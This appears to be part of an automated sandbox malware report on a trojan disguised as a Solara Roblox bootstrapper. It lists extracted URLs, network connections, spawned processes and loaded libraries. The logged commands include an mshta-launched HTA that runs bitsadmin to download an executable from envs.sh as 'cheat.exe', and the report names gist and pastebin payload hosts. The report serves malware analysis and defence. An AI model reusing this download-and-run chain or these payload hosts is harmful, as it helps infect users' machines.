          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
          Source: svchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2202546957.00000230B3318000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2503455769.00000230B3318000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3117005696.00000230B3318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://envs.sh/
          Source: svchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://envs.sh/-
          Source: svchost.exe, 00000006.00000002.3116890459.00000230B32DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://envs.sh/.
          Source: svchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3065181739.00000230B3318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://envs.sh/J
          Source: svchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3116890459.00000230B32DA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2503455769.00000230B3318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://envs.sh/UB.exe
          Source: svchost.exe, 00000006.00000003.2503455769.00000230B3318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://envs.sh/exe
          Source: svchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3116683144.00000230B3200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3116247877.00000230AE513000.00000004.00000020.00020000.00000000.sdmp, Downloader.hta.0.drString found in binary or memory: https://envs.sh/wUB.exe
          Source: edb.log.6.drString found in binary or memory: https://envs.sh/wUB.exe.C:
          Source: bitsadmin.exe, 00000004.00000002.3114396612.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://envs.sh/wUB.exeC:
          Source: svchost.exe, 00000006.00000002.3116810997.00000230B3262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://envs.sh:443/wUB.exe
          Source: svchost.exe, 00000006.00000003.1894883099.00000230B3212000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
          Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
          Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
          Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
          Source: svchost.exe, 00000006.00000003.1894883099.00000230B3212000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268008B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268009E000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268008B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://getsolara.dev/Suspected
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268008B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/X
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://getsolara.dev/api/endpoint.json
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://getsolara.dev/asset/discord.json
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://github.com/zzzprojects/html-agility-pack/issues/513
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268014B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268018B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268014B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680187000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
          Source: svchost.exe, 00000006.00000003.1894883099.00000230B3212000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
          Source: edb.log.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pjseRvyK
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800E2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800C9000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
          Source: BootstrapperV1.19.exe.0.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 89.163.145.170:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 128.116.119.3:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B71C8642_2_00007FFD9B71C864
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B710E602_2_00007FFD9B710E60
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B710E882_2_00007FFD9B710E88
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B710E002_2_00007FFD9B710E00
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B710DC82_2_00007FFD9B710DC8
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B70DA752_2_00007FFD9B70DA75
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B710E902_2_00007FFD9B710E90
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B710ED32_2_00007FFD9B710ED3
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe 97572BD57B08B59744E4DFE6F93FB96BE4002DFE1AA78683771725401776464F
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184
          Source: BITD1EE.tmp.6.drStatic PE information: No import functions for PE file found
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, 00000000.00000002.1876098928.000000001BBD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXE.MUID vs SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, 00000000.00000002.1873391944.0000000001216000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeBinary or memory string: OriginalFilenameSolara.exe4 vs SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drBinary or memory string: .sln
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drBinary or memory string: .csproj.css
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drBinary or memory string: .vbproj.vbs
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/14@5/6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeFile created: C:\Users\user\AppData\Roaming\Downloader.htaJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeMutant created: \Sessions\1\BaseNamedObjects\0k3GqkzQa4gYrITr6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeFile created: C:\Users\user\AppData\Local\Temp\node-v18.16.0-x64.msiJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeReversingLabs: Detection: 68%
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeVirustotal: Detection: 56%
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess created: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe"
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe
          Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess created: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
